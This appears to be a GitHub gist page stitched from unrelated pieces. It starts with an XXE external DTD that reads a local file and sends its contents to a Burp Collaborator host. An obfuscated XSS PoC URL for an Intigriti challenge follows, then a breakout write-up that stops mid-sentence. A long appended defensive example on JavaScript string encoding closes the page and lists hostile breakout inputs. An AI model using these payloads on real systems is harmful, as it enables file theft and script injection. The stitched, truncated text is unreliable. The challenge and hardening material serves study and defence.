@myuyu
myuyu / xx.dtd
Last active February 15, 2022 15:55
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / s.json
Created November 28, 2021 21:06
{
"swagger": "2.0",

alert() PoC:

https://challenge-0521.intigriti.io/captcha.php?c=[][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]]`$${[%2b/3/%2b[]][0][1]%2b[e%2b[]][0][21]%2b[e%2b[]][0][22]%2b[e%2b[]][0][16]%2b[e%2b[]][0][26]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][13]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][14]}$```

PoC for smuggling more data with window.name and executing it with eval:

I noticed that the color parameter can contain any characters, which is useful for getting out of the scope of the variable color=" , but it is limited: only 3 characters are reflected.

And because the value of the nickname parameter is reflected after the color, we can take advantage of that by turning everything after color into a comment until we reach the value of the nickname parameter: color="/*&nickname=*/

Then we can use , to add our malicious code with window.location, but the application converts the word location to ( ͡° ͜ʖ ͡°). There is a way to bypass that by using an escaped Unicode sequence for a specific character in the word location, which JavaScript itself converts back to the original form (since (), %60 and some other characters are blocked, location is the better choice).

Unfortunately double quotes, single quotes and %60 are blocked by the application, so we cannot use them to assign our host as a value to location, but fortunately in JavaScript /anything/ is treated as "/anything/", so we assign our host to location
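The root cause in the write-up above is that two request parameters are reflected straight into a JavaScript string context (color=" and the nickname that follows it), and the application tries to compensate by blocklisting words such as location. The added example below is not from the gist or the challenge's own code; it shows the fix a defender would apply instead: encode each reflected value as a self-contained JS string literal so that /*, */, a comma, a backtick or a Unicode-escaped identifier in the input remain data. The page layout (a script that sets color and nickname) and the names jsStringLiteral, renderScript, roundTrips and HOSTILE_INPUTS are assumptions made for this example.

```javascript
// Added example, not the challenge's own code: encoding for a JavaScript
// string context instead of blocklisting words like "location".
// Assumed vulnerable shape: <script>var color="<reflected>"; var nickname="<reflected>";</script>

// Produce a JS string literal safe to embed inside an inline <script>.
// JSON.stringify already escapes quotes, backslashes and control characters;
// the extra replacements close the gaps it leaves for an HTML-embedded script:
// "</script>" and "<!--" (the HTML parser would act on them before JS does),
// "/" (so "/*" and "*/" in the input can never form a comment boundary), and
// U+2028 / U+2029, which JSON allows raw but older JS treats as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\//g, '\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the inline script the hardened way: every reflected value becomes one
// string literal, so nothing in the input can start a comment, close the
// string, or begin a new expression after a comma.
function renderScript(params) {
  return 'var color=' + jsStringLiteral(params.color) + ';' +
         'var nickname=' + jsStringLiteral(params.nickname) + ';';
}

// Check: evaluate our own rendered script and confirm both variables come back
// byte-for-byte equal to the input. A round-trip proves the literal boundaries
// held and the input was treated as data, not code.
function roundTrips(params) {
  const body = renderScript(params) + 'return {color: color, nickname: nickname};';
  const out = new Function(body)();
  return out.color === String(params.color) && out.nickname === String(params.nickname);
}

// Constructed adversarial inputs modelled on the breakout shapes described in
// the write-up (comment open/close across two parameters, quote and comma
// breakouts, template-literal characters, script-tag close, escaped identifier).
const HOSTILE_INPUTS = [
  { color: '/*', nickname: '*/,x=1//' },
  { color: '",', nickname: '"' },
  { color: '`', nickname: '${1+1}' },
  { color: '</script>', nickname: '<!--' },
  { color: '\u2028', nickname: '\\u006cocation' },
];

// True when every hostile input survives the round-trip unchanged.
function allInert() {
  return HOSTILE_INPUTS.every(roundTrips);
}
```

The point of roundTrips is that it checks the property that matters (the reflected value is still a single string literal after rendering) rather than the presence of particular words, which is exactly the check a blocklist on location cannot give: a Unicode-escaped identifier and a regex literal used as a string are both ordinary JavaScript, so the only robust defence is to never let user input reach the parser as code.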